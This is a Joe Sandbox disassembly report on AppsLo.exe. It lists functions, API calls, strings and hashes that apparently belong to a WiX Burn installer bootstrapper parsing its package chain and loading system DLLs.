CoInitializeEx.OLE32(00000000,00000000), ref: 008B57D9
CoUninitialize.OLE32(?,00000000,?,?,?,?,?,?,?), ref: 008B5833

Strings

Failed to initialize COM on cache thread., xrefs: 008B57E5

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: InitializeUninitialize
String ID: Failed to initialize COM on cache thread.
API String ID: 3442037557-3629645316
Opcode ID: 5f1e2fda4c63958919d09d092c9b47babf41891cf4f712c99159f89383db18e1
Instruction ID: 87630284879f7ab70dda75c724737631d87a263e8b0a2faaff387c96b2b4aa90
Opcode Fuzzy Hash: 5f1e2fda4c63958919d09d092c9b47babf41891cf4f712c99159f89383db18e1
Instruction Fuzzy Hash: 49015E7260061ABFC7059BA9D884ED6FBECFF08354B108125F609C7211DB31AD548BD0

Function 008E3BF1 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47registryCOMMON

Download Yara Rule

APIs

Part of subcall function 008E0F6C: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,0090AAA0,00000000,?,008E57E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 008E0F80

RegCloseKey.ADVAPI32(00000000,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System,00020019,00000000,?,?,?,?,?,008E3A8E,?), ref: 008E3C62

Strings

SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System, xrefs: 008E3C0C
EnableLUA, xrefs: 008E3C34

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: CloseOpen
String ID: EnableLUA$SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
API String ID: 47109696-3551287084
Opcode ID: 353d127e288a3c5ba8cc0ad332b7b8fc7538c12cca382f099780e6d0841bba22
Instruction ID: 83715fd1e3963feb9d467c9064ed0d8f661284bb548e1f0ced7af41c4d1bfa91
Opcode Fuzzy Hash: 353d127e288a3c5ba8cc0ad332b7b8fc7538c12cca382f099780e6d0841bba22
Instruction Fuzzy Hash: BA01DF32C00229FFC7209AA5C80ABEEF6A8EB11721F3041A4A800F3041D3759F50D6D0

Function 008A5123 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(burn.clean.room,?,?,?,?,008A1104,?,?,00000000), ref: 008A5142
CompareStringW.KERNEL32(0000007F,00000001,?,0000000F,burn.clean.room,0000000F,?,?,?,?,008A1104,?,?,00000000), ref: 008A5172

Strings

burn.clean.room, xrefs: 008A512F, 008A513C, 008A5169

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: CompareStringlstrlen
String ID: burn.clean.room
API String ID: 1433953587-3055529264
Opcode ID: f32d53171790430c971acce6aac9f31ea9dca46741682ed5a7f29c4ccdbcd8a1
Instruction ID: c481af236d5f4b1e9d4c30f9ff2b48843512a765a1c91985e00e8c0c4a838adf
Opcode Fuzzy Hash: f32d53171790430c971acce6aac9f31ea9dca46741682ed5a7f29c4ccdbcd8a1
Instruction Fuzzy Hash: D201AD726146246FE3308B98AC84A33BBADFB167A0B104116F909C7A20C3309C81DAE1

Function 008E6920 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(00000000), ref: 008E6985

Strings

atomutil.cpp, xrefs: 008E6941
`Dv, xrefs: 008E6985

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: FreeString
String ID: `Dv$atomutil.cpp
API String ID: 3341692771-1153537316
Opcode ID: a012394089c949a3bf6c5d5cbe348c3026f663187e988e2ad240d2996ef142cd
Instruction ID: 91eb7288cd6eb3ff7244e1d5d2353bd88f19bee09da25a8cb19645f1d25ed0d2
Opcode Fuzzy Hash: a012394089c949a3bf6c5d5cbe348c3026f663187e988e2ad240d2996ef142cd
Instruction Fuzzy Hash: A101A232400158FBC7216A9A8C01BAEBB78FF66BB4F240165B800E7152A7756E2196D1

Function 008A6522 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?), ref: 008A6534

Part of subcall function 008E0ACC: GetModuleHandleW.KERNEL32(kernel32,IsWow64Process,?,?,?,008A5EB2,00000000), ref: 008E0AE0
Part of subcall function 008E0ACC: GetProcAddress.KERNEL32(00000000), ref: 008E0AE7
Part of subcall function 008E0ACC: GetLastError.KERNEL32(?,?,?,008A5EB2,00000000), ref: 008E0AFE

Part of subcall function 008A5CE2: RegCloseKey.ADVAPI32(00000000,?,00000000,CommonFilesDir,?,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion,00020119,00000000), ref: 008A5D68

Strings

Failed to get 64-bit folder., xrefs: 008A6557
Failed to set variant value., xrefs: 008A6571

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: AddressCloseCurrentErrorHandleLastModuleProcProcess
String ID: Failed to get 64-bit folder.$Failed to set variant value.
API String ID: 3109562764-2681622189
Opcode ID: 09d1ca41f410e52581c60c42fbfcfe3561482a1e9e1dc9654fecdaf021145f4f
Instruction ID: eac8f26eb0eaec93cd26422ad6ff59d137c7376a8e7dcf300637408a4d0ab89b
Opcode Fuzzy Hash: 09d1ca41f410e52581c60c42fbfcfe3561482a1e9e1dc9654fecdaf021145f4f
Instruction Fuzzy Hash: 2501A232D01228BBDF21AB95CC06A9E7B78FF02730F144155F800E6159E6719F60DBC1

Function 008A33C7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,?,00000104,?,?,?,?,008A10DD,?,00000000), ref: 008A33E8
GetLastError.KERNEL32(?,?,?,?,008A10DD,?,00000000), ref: 008A33FF

Strings

pathutil.cpp, xrefs: 008A3423

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: ErrorFileLastModuleName
String ID: pathutil.cpp
API String ID: 2776309574-741606033
Opcode ID: 7bab691540e24b70b2d3f96457a45d17f2693ee2dbe2c64bba543e84d8f3e6c8
Instruction ID: eef0e45bb107a90306cd45a629c5a0ed42bb27a7911e70ba9f3c371a868d9e20
Opcode Fuzzy Hash: 7bab691540e24b70b2d3f96457a45d17f2693ee2dbe2c64bba543e84d8f3e6c8
Instruction Fuzzy Hash: 9DF0C273A46A3567E732569A6C49A8BFA58FB57B70B120131BE04FFA10DA61DD0082E0

Function 008CE30F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 008CEBD2

Part of subcall function 008D1380: RaiseException.KERNEL32(?,?,?,008CEBF4,?,00000000,00000000,?,?,?,?,?,008CEBF4,?,00907EC8), ref: 008D13DF

__CxxThrowException@8.LIBVCRUNTIME ref: 008CEBEF

Strings

Unknown exception, xrefs: 008CEBFC

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: Exception@8Throw$ExceptionRaise
String ID: Unknown exception
API String ID: 3476068407-410509341
Opcode ID: 2020090f1622be6922868efab77d89ade9f35ff6be793b5fd7ff3c31e93a5f29
Instruction ID: 89a571be25606f7d82a13694c16fcb15056c98048270fb203e29f90557236a48
Opcode Fuzzy Hash: 2020090f1622be6922868efab77d89ade9f35ff6be793b5fd7ff3c31e93a5f29
Instruction Fuzzy Hash: A4F0F43480020C7BCF00BAE8E80AF6C737CFE00320B504269F815E26D1EB70FE158282

Function 008E4A05 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40COMMON

Download Yara Rule

APIs

GetFileSizeEx.KERNEL32(00000000,00000000,00000000,762334C0,?,?,?,008ABA1D,?,?,?,00000000,00000000), ref: 008E4A1D
GetLastError.KERNEL32(?,?,?,008ABA1D,?,?,?,00000000,00000000,?,?,?,00000000,7736C3F0,00000000), ref: 008E4A27

Strings

fileutil.cpp, xrefs: 008E4A4B

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: ErrorFileLastSize
String ID: fileutil.cpp
API String ID: 464720113-2967768451
Opcode ID: 6a51630380d55b72c697cc69a36d21e369afa0457d28c4a25e97c22e7bceb5fd
Instruction ID: 0b8ad47546dd86383ece69b34b1e73ab4cf62b890d036c5d97eca5acf67fc00f
Opcode Fuzzy Hash: 6a51630380d55b72c697cc69a36d21e369afa0457d28c4a25e97c22e7bceb5fd
Instruction Fuzzy Hash: 4BF0A47294013AABD7209F89C90595AFBACFF05720B014166FD58E7300E770AD1087D4

Function 008E3D80 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36comCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32(Microsoft.Update.AutoUpdate,008A5466,?,00000000,008A5466,?,?,?), ref: 008E3DA7
CoCreateInstance.OLE32(00000000,00000000,00000001,0090716C,?), ref: 008E3DBF

Strings

Microsoft.Update.AutoUpdate, xrefs: 008E3DA2

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: CreateFromInstanceProg
String ID: Microsoft.Update.AutoUpdate
API String ID: 2151042543-675569418
Opcode ID: 3da2a50c0c8c6decec32ec0e3eeb74496b8f7ced96f257b08e6cd928f303f612
Instruction ID: fb9ae3d102a89ebedd303540732c284bb038c6b6eb9a3921752fc6e52596d825
Opcode Fuzzy Hash: 3da2a50c0c8c6decec32ec0e3eeb74496b8f7ced96f257b08e6cd928f303f612
Instruction Fuzzy Hash: 91F03071610208BFD700DFA9DD46AAFB7BCEB49710F400065EA01E7190D671AE0486B2

Function 008E0E07 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(RegDeleteKeyExW,AdvApi32.dll), ref: 008E0E28

Strings

RegDeleteKeyExW, xrefs: 008E0E1D
AdvApi32.dll, xrefs: 008E0E0D

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: AddressProc
String ID: AdvApi32.dll$RegDeleteKeyExW
API String ID: 190572456-850864035
Opcode ID: 3bc5071bcf3aedd8f9145f1fb4be90cf5c52f1e708b0564d169007b3ff7dca65
Instruction ID: 0caffed941dac262138e88cb24bbb0d7649453dbadaa1c7584b098ccdbbf6ffd
Opcode Fuzzy Hash: 3bc5071bcf3aedd8f9145f1fb4be90cf5c52f1e708b0564d169007b3ff7dca65
Instruction Fuzzy Hash: 03E0EC705157669ECB119B15BC09B427E90F751F69F004524E404DA2B0DBB35850EF90

Analysis Process: AppsLo.exePID: 6672, Parent PID: 2032COMMON

Executed Functions

Function 00F51070 Relevance: 19.3, APIs: 2, Strings: 9, Instructions: 78fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00F533C7: GetModuleFileNameW.KERNEL32(?,?,00000104,?,00000104,?,?,?,?,00F510DD,?,00000000), ref: 00F533E8

CreateFileW.KERNELBASE(?,80000000,00000005,00000000,00000003,00000080,00000000,?,00000000), ref: 00F510F6

Part of subcall function 00F51175: HeapSetInformation.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,?,00F5111A,cabinet.dll,00000009,?,?,00000000), ref: 00F51186
Part of subcall function 00F51175: GetModuleHandleW.KERNEL32(kernel32,?,?,?,?,?,00F5111A,cabinet.dll,00000009,?,?,00000000), ref: 00F51191
Part of subcall function 00F51175: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00F5119F
Part of subcall function 00F51175: GetLastError.KERNEL32(?,?,?,?,?,00F5111A,cabinet.dll,00000009,?,?,00000000), ref: 00F511BA
Part of subcall function 00F51175: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00F511C2
Part of subcall function 00F51175: GetLastError.KERNEL32(?,?,?,?,?,00F5111A,cabinet.dll,00000009,?,?,00000000), ref: 00F511D7

CloseHandle.KERNEL32(?,?,?,?,00F9B4D0,?,cabinet.dll,00000009,?,?,00000000), ref: 00F51131

Strings

crypt32.dll, xrefs: 00F510CA
wininet.dll, xrefs: 00F510AE
cabinet.dll, xrefs: 00F51099, 00F51114
clbcatq.dll, xrefs: 00F510BC
msi.dll, xrefs: 00F510A0
feclient.dll, xrefs: 00F510D1
msasn1.dll, xrefs: 00F510C3
comres.dll, xrefs: 00F510B5
version.dll, xrefs: 00F510A7

Memory Dump Source

Source File: 00000007.00000002.2464405499.0000000000F51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00F50000, based on PE: true

Associated: 00000007.00000002.2464385625.0000000000F50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464442789.0000000000F9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464508297.0000000000FBA000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464567720.0000000000FBD000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_f50000_AppsLo.jbxd

Similarity

API ID: AddressErrorFileHandleLastModuleProc$CloseCreateHeapInformationName
String ID: cabinet.dll$clbcatq.dll$comres.dll$crypt32.dll$feclient.dll$msasn1.dll$msi.dll$version.dll$wininet.dll
API String ID: 3687706282-3151496603
Opcode ID: d39abd91027bd2890ba35aa10aa4a545be3e339dabc8f4b224381269e156c9fa
Instruction ID: f226b8bb35495e575d831856b28fb1e5e24892a5e1451aa5b0665aa4edbe1424
Opcode Fuzzy Hash: d39abd91027bd2890ba35aa10aa4a545be3e339dabc8f4b224381269e156c9fa
Instruction Fuzzy Hash: 6C218071D0061CABEF10DFA8ED45BDEBBB8BB09711F104155EE10B7282D7746908EBA0

Function 00F8FEC6 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 132threadtimeCOMMONLIBRARYCODE

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(00FBB5FC,00000000,?,?,?,?,00F6E93B,8000FFFF,Unexpected return value from message pump.), ref: 00F8FEF4
GetCurrentProcessId.KERNEL32(00000000,?,00F6E93B,8000FFFF,Unexpected return value from message pump.), ref: 00F8FF04
GetCurrentThreadId.KERNEL32 ref: 00F8FF0D
GetLocalTime.KERNEL32(8000FFFF,?,00F6E93B,8000FFFF,Unexpected return value from message pump.), ref: 00F8FF23
LeaveCriticalSection.KERNEL32(00FBB5FC,00F6E93B,?,00000000,0000FDE9,?,00F6E93B,8000FFFF,Unexpected return value from message pump.), ref: 00F9001A

Strings

%ls[%04X:%04X][%04hu-%02hu-%02huT%02hu:%02hu:%02hu]%hs%03d:%ls %ls%ls, xrefs: 00F8FFC0

Memory Dump Source

Source File: 00000007.00000002.2464405499.0000000000F51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00F50000, based on PE: true

Associated: 00000007.00000002.2464385625.0000000000F50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464442789.0000000000F9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464508297.0000000000FBA000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464567720.0000000000FBD000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_f50000_AppsLo.jbxd

Similarity

API ID: CriticalCurrentSection$EnterLeaveLocalProcessThreadTime
String ID: %ls[%04X:%04X][%04hu-%02hu-%02huT%02hu:%02hu:%02hu]%hs%03d:%ls %ls%ls
API String ID: 296830338-59366893
Opcode ID: f58b657e33e22793f5bdadd4722f6cadd7f61d7e8417f2fa360e8714a886e03d
Instruction ID: 704a156e13b7ae5001562d4fbaf6773199feac94c05de4e5811d6a7340be47a1
Opcode Fuzzy Hash: f58b657e33e22793f5bdadd4722f6cadd7f61d7e8417f2fa360e8714a886e03d
Instruction Fuzzy Hash: 03417072D01219AFDF21AFA5DC44AFEB7B9EB08B11F140125FA01E6161D7389D44FBA1

Function 00F6A0BB Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 51COMMON

Download Yara Rule

Strings

Failed to copy working folder., xrefs: 00F6A116
Failed create working folder., xrefs: 00F6A0EE
Failed to calculate working folder to ensure it exists., xrefs: 00F6A0D8

Memory Dump Source

Source File: 00000007.00000002.2464405499.0000000000F51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00F50000, based on PE: true

Associated: 00000007.00000002.2464385625.0000000000F50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464442789.0000000000F9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464508297.0000000000FBA000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464567720.0000000000FBD000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_f50000_AppsLo.jbxd

Similarity

API ID: CurrentDirectoryErrorLastProcessWindows
String ID: Failed create working folder.$Failed to calculate working folder to ensure it exists.$Failed to copy working folder.
API String ID: 3841436932-2072961686
Opcode ID: 4be37c047943e3d19d08f7e685d295742ff88cdaa34ee6b313e996f3b43345a8
Instruction ID: 1b346934f7a968e8f11ddd1a72df6bd380768d58ee2cb5e359e63d8c28483856
Opcode Fuzzy Hash: 4be37c047943e3d19d08f7e685d295742ff88cdaa34ee6b313e996f3b43345a8
Instruction Fuzzy Hash: A201A232D01928FB8F236B55DD06D9EBBB9DF86B20B104256FC00B6211DB359E40BE92

Function 00F5DF33 Relevance: 126.6, APIs: 11, Strings: 61, Instructions: 646COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(00000000), ref: 00F5E058
SysFreeString.OLEAUT32(00000000), ref: 00F5E736

Part of subcall function 00F5394F: GetProcessHeap.KERNEL32(?,?,?,00F52274,?,00000001,7694B390,8000FFFF,?,?,00F90267,?,?,00000000,00000000,8000FFFF), ref: 00F53960
Part of subcall function 00F5394F: RtlAllocateHeap.NTDLL(00000000,?,00F52274,?,00000001,7694B390,8000FFFF,?,?,00F90267,?,?,00000000,00000000,8000FFFF), ref: 00F53967

Strings

Failed to allocate memory for package structs., xrefs: 00F5E0EF
cabinet.dll, xrefs: 00F5E1FE
Failed to parse target product codes., xrefs: 00F5E69B
package.cpp, xrefs: 00F5DFBE, 00F5E0E3, 00F5E4CF, 00F5E564
Failed to get @RollbackBoundaryForward., xrefs: 00F5E510
Failed to parse MSU package., xrefs: 00F5E53B
InstallSize, xrefs: 00F5E1FF
RollbackBoundaryBackward, xrefs: 00F5E319
always, xrefs: 00F5E1A7
Failed to get @InstallCondition., xrefs: 00F5E4F9
clbcatq.dll, xrefs: 00F5E219
Failed to get @RollbackBoundaryBackward., xrefs: 00F5E527
Failed to allocate memory for MSP patch sequence information., xrefs: 00F5E4DB
LogPathVariable, xrefs: 00F5E276
Failed to get @InstallSize., xrefs: 00F5E6CD
Failed to get rollback bundary node count., xrefs: 00F5DF8E
RollbackLogPathVariable, xrefs: 00F5E299
Failed to get @LogPathVariable., xrefs: 00F5E4E5
Failed to get next node., xrefs: 00F5E708
Failed to get @Vital., xrefs: 00F5E6B8
Chain/ExePackage|Chain/MsiPackage|Chain/MspPackage|Chain/MsuPackage, xrefs: 00F5E081
Failed to get @PerMachine., xrefs: 00F5E6C6
Failed to find backward transaction boundary: %ls, xrefs: 00F5E51D
Failed to parse EXE package., xrefs: 00F5E389
yes, xrefs: 00F5E187
Failed to parse payload references., xrefs: 00F5E6B1
Cache, xrefs: 00F5E14B
Failed to get @Id., xrefs: 00F5E701
Permanent, xrefs: 00F5E235
Failed to select package nodes., xrefs: 00F5E094
Failed to get @Cache., xrefs: 00F5E6FA
Failed to get @Size., xrefs: 00F5E6D4
Failed to get @RollbackLogPathVariable., xrefs: 00F5E4EF
PerMachine, xrefs: 00F5E21A
RollbackBoundaryForward, xrefs: 00F5E2DF
Failed to allocate memory for patch sequence information to package lookup., xrefs: 00F5E570
Failed to get @CacheId., xrefs: 00F5E6DB
wininet.dll, xrefs: 00F5E25A
Failed to parse dependency providers., xrefs: 00F5E6AA
Vital, xrefs: 00F5E027, 00F5E25B
InstallCondition, xrefs: 00F5E2BC
ExePackage, xrefs: 00F5E357
comres.dll, xrefs: 00F5E234
Failed to parse MSP package., xrefs: 00F5E531
CacheId, xrefs: 00F5E1C9
Failed to get @Permanent., xrefs: 00F5E6BF
`Dv, xrefs: 00F5E058, 00F5E47B, 00F5E736
msi.dll, xrefs: 00F5E1C8
feclient.dll, xrefs: 00F5E298
Failed to allocate memory for rollback boundary structs., xrefs: 00F5DFCA
crypt32.dll, xrefs: 00F5E2BB
RollbackBoundary, xrefs: 00F5DF56
MsiPackage, xrefs: 00F5E395
Failed to select rollback boundary nodes., xrefs: 00F5DF69
MsuPackage, xrefs: 00F5E406
Invalid cache type: %ls, xrefs: 00F5E6EA
Failed to get package node count., xrefs: 00F5E0B1
MspPackage, xrefs: 00F5E3CD
Size, xrefs: 00F5E1E4
Failed to parse MSI package., xrefs: 00F5E3C1
Failed to find forward transaction boundary: %ls, xrefs: 00F5E506

Memory Dump Source

Source File: 00000007.00000002.2464405499.0000000000F51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00F50000, based on PE: true

Associated: 00000007.00000002.2464385625.0000000000F50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464442789.0000000000F9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464508297.0000000000FBA000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464567720.0000000000FBD000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_f50000_AppsLo.jbxd

Similarity

API ID: FreeHeapString$AllocateProcess
String ID: Cache$CacheId$Chain/ExePackage|Chain/MsiPackage|Chain/MspPackage|Chain/MsuPackage$ExePackage$Failed to allocate memory for MSP patch sequence information.$Failed to allocate memory for package structs.$Failed to allocate memory for patch sequence information to package lookup.$Failed to allocate memory for rollback boundary structs.$Failed to find backward transaction boundary: %ls$Failed to find forward transaction boundary: %ls$Failed to get @Cache.$Failed to get @CacheId.$Failed to get @Id.$Failed to get @InstallCondition.$Failed to get @InstallSize.$Failed to get @LogPathVariable.$Failed to get @PerMachine.$Failed to get @Permanent.$Failed to get @RollbackBoundaryBackward.$Failed to get @RollbackBoundaryForward.$Failed to get @RollbackLogPathVariable.$Failed to get @Size.$Failed to get @Vital.$Failed to get next node.$Failed to get package node count.$Failed to get rollback bundary node count.$Failed to parse EXE package.$Failed to parse MSI package.$Failed to parse MSP package.$Failed to parse MSU package.$Failed to parse dependency providers.$Failed to parse payload references.$Failed to parse target product codes.$Failed to select package nodes.$Failed to select rollback boundary nodes.$InstallCondition$InstallSize$Invalid cache type: %ls$LogPathVariable$MsiPackage$MspPackage$MsuPackage$PerMachine$Permanent$RollbackBoundary$RollbackBoundaryBackward$RollbackBoundaryForward$RollbackLogPathVariable$Size$Vital$`Dv$always$cabinet.dll$clbcatq.dll$comres.dll$crypt32.dll$feclient.dll$msi.dll$package.cpp$wininet.dll$yes
API String ID: 336948655-3261472537
Opcode ID: 457fbfdb3d806a87881bf12c36d625084a6b84803b24f8cbb9796ec6583a6b32
Instruction ID: 7a7900a3734d8ba6068e6892a09be0dd953b64f62b0c8f38347d91e62c2cfe0d
Opcode Fuzzy Hash: 457fbfdb3d806a87881bf12c36d625084a6b84803b24f8cbb9796ec6583a6b32
Instruction Fuzzy Hash: 8232C271E40226EBDB159F54CC41BAEBBB4AF04762F114265EE10BB290DB74EE04BB91

Function 00F5F9E3 Relevance: 112.4, APIs: 3, Strings: 61, Instructions: 446
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Failed to get @AboutUrl., xrefs: 00F5FC4E
Failed to select registration node., xrefs: 00F5FA1C
Invalid modify disabled type: %ls, xrefs: 00F5FD94
HelpLink, xrefs: 00F5FBED
